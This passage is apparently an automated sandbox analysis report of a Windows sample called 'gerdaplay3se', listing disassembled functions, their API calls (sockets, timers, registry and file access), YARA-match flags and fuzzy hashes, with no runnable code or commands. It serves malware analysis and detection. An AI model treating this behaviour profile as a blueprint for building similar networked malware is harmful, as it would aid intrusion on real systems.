GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
GetTickCount.KERNEL32 ref: 00401FFB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
String ID:
API String ID: 564119183-0
Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8

Function 02D626DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 02D62706
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D6272B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D85A93), ref: 02D62738

Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717

SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D62778
RtlLeaveCriticalSection.NTDLL(?), ref: 02D627D9

Strings

timer, xrefs: 02D62745

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID: timer
API String ID: 4293676635-1792073242
Opcode ID: 610973c259d97d2d3507e39a2b267aa480c85b16f62b89e108a7860d5978a358
Instruction ID: 4c89d3e433296dd7ffce74989a95e2234ccacaa2ab451116068626cb058b7bd8
Opcode Fuzzy Hash: 610973c259d97d2d3507e39a2b267aa480c85b16f62b89e108a7860d5978a358
Instruction Fuzzy Hash: 97316FB1914705AFD310DF65D988B66BBE8FB48725F104A2EF85586780E770EC14CFA1

Function 02D62B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000), ref: 02D62BE4
WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D62C07

Part of subcall function 02D6A440: WSAGetLastError.WS2_32(00000000,?,?,02D62A51), ref: 02D6A44E

WSASetLastError.WS2_32 ref: 02D62CD3
select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D62CE7

Strings

3', xrefs: 02D62C85

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLast$Recvselect
String ID: 3'
API String ID: 886190287-280543908
Opcode ID: 9e597475e1ab1277160443703efac1af1179eb29e2f7f73aef86aa8528eddd7d
Instruction ID: 0d8871a33bf93fe994f535daf6b151fb553c0e215684fba979940e46d76702a0
Opcode Fuzzy Hash: 9e597475e1ab1277160443703efac1af1179eb29e2f7f73aef86aa8528eddd7d
Instruction Fuzzy Hash: 624108B19183019FD7109F64C94D76ABBEAEF84365F10492EE899C7380EB74D940CBA2

Function 0040228B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32 ref: 0040B305
GetCommandLineW.KERNEL32(?), ref: 0040B324
CommandLineToArgvW.SHELL32(00000000), ref: 0040B655
GetLocalTime.KERNEL32(00409F90), ref: 0040B878

Strings

Eclipse IO Library 9.27.43, xrefs: 0040B30B

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CommandLine$ArgvFileLocalModuleNameTime
String ID: Eclipse IO Library 9.27.43
API String ID: 1042648101-2124222407
Opcode ID: 4ea5313fc702dad747c75675afa4d068a86737ebefe062ed9685430f81578187
Instruction ID: dc972e520a3a1c25a8e085b75d184a989db7c982d5ef784bdd5d1ca802e4f2f6
Opcode Fuzzy Hash: 4ea5313fc702dad747c75675afa4d068a86737ebefe062ed9685430f81578187
Instruction Fuzzy Hash: 1701D131848282EFC70097A18C5D5687BE4EE0635132584BFE193AB0E3CB3C4492DB5E

Function 02D629EE Relevance: 7.6, APIs: 5, Instructions: 79
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000), ref: 02D62A3B
closesocket.WS2_32 ref: 02D62A42
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D62A89
WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D62A97
closesocket.WS2_32 ref: 02D62A9E

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket$ioctlsocket
String ID:
API String ID: 1561005644-0
Opcode ID: 4ec3ba94cd207d2fd19936419df4fedfa5e7aecd29ee2a04c08c9166038df10e
Instruction ID: c5cb5da9abe64fd54e6e0ee6289ba1ac49ad3ba3be6027ce1230aeec4ed07bff
Opcode Fuzzy Hash: 4ec3ba94cd207d2fd19936419df4fedfa5e7aecd29ee2a04c08c9166038df10e
Instruction Fuzzy Hash: D321F475A14205ABEB209BB88D4CB7AB7E9EF44316F108969EC55D3380FBB4CD40CB61

Function 02D61BA7 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02D61BAC
RtlEnterCriticalSection.NTDLL ref: 02D61BBC
RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
RtlEnterCriticalSection.NTDLL ref: 02D61C13
RtlLeaveCriticalSection.NTDLL ref: 02D61C56

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 29e43ac7d6f20b6169c4d0a05fafeca6879225255c122aefed6cfd92e3618d1c
Instruction ID: f0fc7c741453bf5e14da7d520794a0964e757351567761f44b48fe8fe539527c
Opcode Fuzzy Hash: 29e43ac7d6f20b6169c4d0a05fafeca6879225255c122aefed6cfd92e3618d1c
Instruction Fuzzy Hash: CB21AB79A002059FDB14CF68C8487AAFBB5FF48710F218589E8599B301D770ED11CBA0

Function 02D73A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02D73AA7

Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F

std::exception::exception.LIBCMT ref: 02D73AC5
__CxxThrowException@8.LIBCMT ref: 02D73ADA

Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF

Strings

bad allocation, xrefs: 02D73ABA

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: 2216a5614f64f2f79ec9059022a58043d917b089c707e2318b2c5ead1bad05b2
Instruction ID: d17a48ee12f4f1d00e9078fd131e12249a18037a0479c8a42e0a936d77efe90a
Opcode Fuzzy Hash: 2216a5614f64f2f79ec9059022a58043d917b089c707e2318b2c5ead1bad05b2
Instruction Fuzzy Hash: D6E0307190420EAADF00FEA4DC099AFB769EB00355F5005A5AC14A5790FB75DE44E9A1

Function 00402D60 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00402D86

Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40

GetCommandLineA.KERNEL32 ref: 00402DD4
GetStartupInfoA.KERNEL32(?), ref: 00402DFF
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22

Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59

Function 02D62EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 02D62EEE
WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D62EFD
WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D62F0C
setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D62F36

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLast$Socketsetsockopt
String ID:
API String ID: 2093263913-0
Opcode ID: 9136e7854c4f91841eb994d0e9ab7e7b6626a79d47ebe15c2efc67dea998beb9
Instruction ID: 4375a046a129061e78bf1e6a9a0935b85f1be1a0374c076ef8f73a57b1f5847a
Opcode Fuzzy Hash: 9136e7854c4f91841eb994d0e9ab7e7b6626a79d47ebe15c2efc67dea998beb9
Instruction Fuzzy Hash: 5A017575950204BBDB205F66DC49F5ABBADEB89771F00C565F918CB281D7748D00CBB1

Function 02DA0DFA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 161fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 02DA0E22
CloseHandle.KERNELBASE ref: 02DBF2BB

Strings

O~|, xrefs: 02DBF284

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd

Similarity

API ID: CloseFileHandleWrite
String ID: O~|
API String ID: 1769507746-3096879844
Opcode ID: 2ae2de1f70dc79a7f14f504f3ee3f3d40cf5553912e2032620e59572ed277b62
Instruction ID: ddf6ebfc2a7a1950730e0bd954c758a589c5023f1f5585c1ef85151d1ea8a312
Opcode Fuzzy Hash: 2ae2de1f70dc79a7f14f504f3ee3f3d40cf5553912e2032620e59572ed277b62
Instruction Fuzzy Hash: 64514CF290C604AFE715AE19EC85BBAFBE5EF84720F16482DE7C483700E6355840CA97

Function 02D62DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON

Download Yara Rule

APIs

Part of subcall function 02D62D39: WSASetLastError.WS2_32(00000000), ref: 02D62D47
Part of subcall function 02D62D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D62D5C

WSASetLastError.WS2_32(00000000), ref: 02D62E6D
select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D62E83

Strings

3', xrefs: 02D62E22

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLast$Sendselect
String ID: 3'
API String ID: 2958345159-280543908
Opcode ID: 58ae76e7e0a3056e6f431f37fe7739482019d634a0be5942c75b9ec2fd2db327
Instruction ID: 2dc7dfeeae7d8ec03bb4c52ed091c0051965c13643c3b21c62ebc6ed665a13ae
Opcode Fuzzy Hash: 58ae76e7e0a3056e6f431f37fe7739482019d634a0be5942c75b9ec2fd2db327
Instruction Fuzzy Hash: 53317CB1A002059BDB109FA4C84DBFEBBAAEF44324F00456ADC4997380E7759D54CFE0

Function 02D6CCDB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6CCE0

Part of subcall function 02D6D29E: std::exception::exception.LIBCMT ref: 02D6D2CB

Part of subcall function 02D6DAB4: __EH_prolog.LIBCMT ref: 02D6DAB9

Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7

Part of subcall function 02D6D2FB: __EH_prolog.LIBCMT ref: 02D6D300

Strings

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D6CD16
C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D6CD1D

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 1953324306-412195191
Opcode ID: 722063e8390fe835a36313dd7bf27b7d970719058fc8b368bb1e65cd261eb52b
Instruction ID: d92c50a4be64f4d3a3137d0f4b78e333a4a8175744feb54d04175a380b7af98d
Opcode Fuzzy Hash: 722063e8390fe835a36313dd7bf27b7d970719058fc8b368bb1e65cd261eb52b
Instruction Fuzzy Hash: A221A0B1E142489BDB04EFE8E848AFDBBB6EF15704F00414DE845A7380DB709E44CBA0

Function 02D62AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 02D62AEA
connect.WS2_32(?,?,?), ref: 02D62AF5

Strings

3', xrefs: 02D62B3B

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLastconnect
String ID: 3'
API String ID: 374722065-280543908
Opcode ID: b61ecb984499699446706fe15d7a5d4faf958484ce996a1889b79709779b101f
Instruction ID: 684936b9410e823f8b5de0e12adddad352709f078f7a3958cf5c2692872d9c15
Opcode Fuzzy Hash: b61ecb984499699446706fe15d7a5d4faf958484ce996a1889b79709779b101f
Instruction Fuzzy Hash: 34219874D041059BDF10AFA8C40C6BDBBBAEF44325F104559DC1997380EB749D018FA1

Function 02D6353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D63543

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ca4ffa3eef8dbc17113a5fd3d09d40a07a8047be0a0664934bd07af1368be9a3
Instruction ID: cc2eebf07652a42b83b67c52ddc9b353a8fcefaf9b47b76d770ac5d9ca6d27e0
Opcode Fuzzy Hash: ca4ffa3eef8dbc17113a5fd3d09d40a07a8047be0a0664934bd07af1368be9a3
Instruction Fuzzy Hash: 84513AB1904246DFCB48DF68D445AAABBB1FF08720F10819EE8699B380D774ED10CFA1

Function 02D6369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(?), ref: 02D636A7

Part of subcall function 02D62420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D62432
Part of subcall function 02D62420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D62445
Part of subcall function 02D62420: RtlEnterCriticalSection.NTDLL(?), ref: 02D62454
Part of subcall function 02D62420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62469
Part of subcall function 02D62420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D62470

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
String ID:
API String ID: 1601054111-0
Opcode ID: cfd7478dc4781311d9e96b13e86be2dc7a3c7aed38fb2f2e125024c573410dbf
Instruction ID: 357ba5ec3077072a118b8b20f1fae53ca207d354e37eb37100fefa28c50fdec8
Opcode Fuzzy Hash: cfd7478dc4781311d9e96b13e86be2dc7a3c7aed38fb2f2e125024c573410dbf
Instruction Fuzzy Hash: 2311C1B5100209ABEF219E54DC89FBA3BAAEF10B54F204456FD528A390C734EC60CBA4

Function 02D72030 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON

Download Yara Rule

APIs

__beginthreadex.LIBCMT ref: 02D72046
CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D6A8C0,00000000), ref: 02D72077
ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D6A8C0,00000000), ref: 02D72085

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseHandleResumeThread__beginthreadex
String ID:
API String ID: 1685284544-0
Opcode ID: 06bc212cf6fbe01f09f1e6aeda8232c8c39753ea095aa1151e25b2eab2812c23
Instruction ID: 3f470a2cd2d31e6b01b992f3121d7a2c5b573fffc84462d3f42677b8a7dce018
Opcode Fuzzy Hash: 06bc212cf6fbe01f09f1e6aeda8232c8c39753ea095aa1151e25b2eab2812c23
Instruction Fuzzy Hash: 38F0C270240201ABEB209E6CDC84F91B3E8EF48324F34056AF558D7390D375EC92DAA0

Function 02D61AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(02D9727C), ref: 02D61ABA
WSAStartup.WS2_32(00000002,00000000), ref: 02D61ACB
InterlockedExchange.KERNEL32(02D97280,00000000), ref: 02D61AD7

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Interlocked$ExchangeIncrementStartup
String ID:
API String ID: 1856147945-0
Opcode ID: 9d092d55a165ffa465eea8c33cfed983d8f4c8838588c398004e81eaf25674f8
Instruction ID: 1f29ed4ccf322c4b4fd173fbecfa3dd099ac960a2c80991c70a06867aec76fed
Opcode Fuzzy Hash: 9d092d55a165ffa465eea8c33cfed983d8f4c8838588c398004e81eaf25674f8
Instruction Fuzzy Hash: 71D017759B42045BF62066A0AD0EAB8B72CE705B11F200651FC6AC13C0EA516D2885A6

Function 02DFA471 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02DFB34D

Strings

#rZ*, xrefs: 02DFB351

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd

Similarity

API ID: CreateFile
String ID: #rZ*
API String ID: 823142352-1599676410
Opcode ID: b8aa41df4191c2ff839fd72e7d5db4d2a1b1ccaf9709ecb315b5a850be0fd349
Instruction ID: 8798548e8d6fa2ee09350672e9f4bacf64f928defc4db87ed67495582fd2e191
Opcode Fuzzy Hash: b8aa41df4191c2ff839fd72e7d5db4d2a1b1ccaf9709ecb315b5a850be0fd349
Instruction Fuzzy Hash: 2451D1F360C704AFE7157E29EC85BBEBBD8EB94320F56062DE7C583741EA3558008696

Function 0040B225 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B4E4

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040B225

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Open
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 71445658-2036018995
Opcode ID: 2d5df7d603607d83e32ea2335fe1407f5733ee9528a5b9de8f12e11e9caffe9b
Instruction ID: f16a4debd6cc5e3d1dbfd8abfc7b9284dcc8268b12d4951e383af56c0e44f276
Opcode Fuzzy Hash: 2d5df7d603607d83e32ea2335fe1407f5733ee9528a5b9de8f12e11e9caffe9b
Instruction Fuzzy Hash: E0D0223030C102E6D7004AA0A8093767354E700390F300E33D603F00C1E3BD880AA1AF

Function 00402160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040B6C9

Strings

Common AppData, xrefs: 0040B6BE

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: QueryValue
String ID: Common AppData
API String ID: 3660427363-2574214464
Opcode ID: c55fb4e1a784324d5c4b3e7555b2ea64966d792e9b16d82899e36bc418aedae3
Instruction ID: 17a911c67b51cd0d4472802b1d1215ce876cf38fed415aecc2b2386cedade105
Opcode Fuzzy Hash: c55fb4e1a784324d5c4b3e7555b2ea64966d792e9b16d82899e36bc418aedae3
Instruction Fuzzy Hash: 2EC08C70D48106FEC7104F204E88A7E7A7CBA447403214D37E813B20C0C7BA0002BA2F

Function 02D64BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D64BF2

Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56

Part of subcall function 02D6E02F: __EH_prolog.LIBCMT ref: 02D6E034
Part of subcall function 02D6E02F: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6E0B3

InterlockedExchange.KERNEL32(?,00000000), ref: 02D64CF2

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
String ID:
API String ID: 1927618982-0
Opcode ID: 72692c8b53d5d342611d947dabdd6626bc1573b957cb69d22f9d8b54dc053886
Instruction ID: 50c97488f246215a6af89a6f63954bd2abe5b47b3ea261d5c7ce1f6e87c04d9e
Opcode Fuzzy Hash: 72692c8b53d5d342611d947dabdd6626bc1573b957cb69d22f9d8b54dc053886
Instruction Fuzzy Hash: FD512775D04248DFDB15DFA8D888AEEBBB5EF18314F14806AE905AB351E7709E44CF60

Function 02D9FC92 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(03426F7D), ref: 02DA294A

Strings

++{, xrefs: 02D9FD5A

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd

Similarity

API ID: lstrcat
String ID: ++{
API String ID: 4038537762-3155876417
Opcode ID: d508effd01a1226d8fb01efeaa56b55baf0f812d402f04acd7571699832ad2c9
Instruction ID: 20ba6b8d6026980ec4c2cd48e8cdead78b160b50705745286b4f9267170a5389
Opcode Fuzzy Hash: d508effd01a1226d8fb01efeaa56b55baf0f812d402f04acd7571699832ad2c9
Instruction Fuzzy Hash: A4318DB290C614AFD7157F09DC8577AF7E8EF94320F1A082EEAD987300E6759C508B96

Function 02D62D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 02D62D47
WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D62D5C

Part of subcall function 02D6A440: WSAGetLastError.WS2_32(00000000,?,?,02D62A51), ref: 02D6A44E

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLast$Send
String ID:
API String ID: 1282938840-0
Opcode ID: c2a471ab7ee500478034927c711d8a48f0fd6071bdefd240367d93a976fe377d
Instruction ID: f3664649cd201afc53300510a8fb7b2750a004d11716172530602fcd5642e951
Opcode Fuzzy Hash: c2a471ab7ee500478034927c711d8a48f0fd6071bdefd240367d93a976fe377d
Instruction Fuzzy Hash: EE0121B5904205EFD7205FA5C84897BBBEDFB45365B20452EE89993340EB749D10CBA1

Function 0040220B Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3902f0929868f52f6b83a53faaf5a38de1e7956c54c563d39ba77ae17a9c35b
Instruction ID: 8bfbd58a044552f4b9e8c5aa7f60dcb48bc0ac5b18c7ddd0a1e1a4d068a8d1d1
Opcode Fuzzy Hash: d3902f0929868f52f6b83a53faaf5a38de1e7956c54c563d39ba77ae17a9c35b
Instruction Fuzzy Hash: DA01D17084C101FEDB15AFA18E5CABE3724E910701331453BD803B12D1D7BC8A12A69F

